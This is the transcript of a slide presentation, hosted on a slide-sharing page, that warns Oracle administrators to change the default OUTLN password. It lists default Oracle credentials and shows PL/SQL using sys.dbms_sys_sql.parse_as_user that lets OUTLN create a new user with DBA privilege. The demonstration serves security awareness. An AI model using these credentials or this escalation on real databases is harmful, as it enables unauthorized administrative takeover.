1 / 9

Reminder: Change Default OUTLN Passwords for Enhanced Security

Learn how to change OUTLN password and avoid potential security risks. Tutorial includes sample SQL commands to create a new user with DBA privilege in database. Execute code effectively as a DBA.

teness
Télécharger la présentation

Reminder: Change Default OUTLN Passwords for Enhanced Security

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch

  2. Default passwords • sys/change_on_install • system/manager • outln/outln

  3. Log on as OUTLN SQL> show user USER is "OUTLN" SQL> select * from all_users where username = 'HACKY'; no rows selected

  4. SQL> select * FROM SESSION_PRIVS; PRIVILEGE ---------------------------------------- CREATE SESSION ALTER SESSION UNLIMITED TABLESPACE CREATE TABLE CREATE CLUSTER CREATE SYNONYM CREATE VIEW CREATE SEQUENCE CREATE DATABASE LINK CREATE PROCEDURE EXECUTE ANY PROCEDURE CREATE TRIGGER CREATE TYPE CREATE OPERATOR CREATE INDEXTYPE 15 rows selected. OUTLN has lots of privileges

  5. So create a user with DBA privilege DECLARE mycur INTEGER; BEGIN mycur := sys.dbms_sys_sql.open_cursor; sys.dbms_sys_sql.parse_as_user(mycur, 'create user hacky identified by macho',dbms_sql.native, 0); sys.dbms_sys_sql.parse_as_user(mycur, 'grant dba to hacky',dbms_sql.native,0); sys.dbms_sys_sql.close_cursor(mycur); END; / PL/SQL procedure successfully completed.

  6. So I did create the user, but I don’t have the privileges myself SQL> DROP USER HACKY; DROP USER HACKY * ERROR at line 1: ORA-01031: insufficient privileges

  7. The keys to the kingdom • I have created a new user with DBA privilege • I have executed code as the DBA • I could do anything! • Worried?

  8. The Moral of this story is… • Change all the default passwords • Including OUTLN/OUTLN

  9. Remember to change the OUTLN password Urs Messerli Messerli Datenbanktechnik Gmbh www.datenbanktechnik.ch

More Related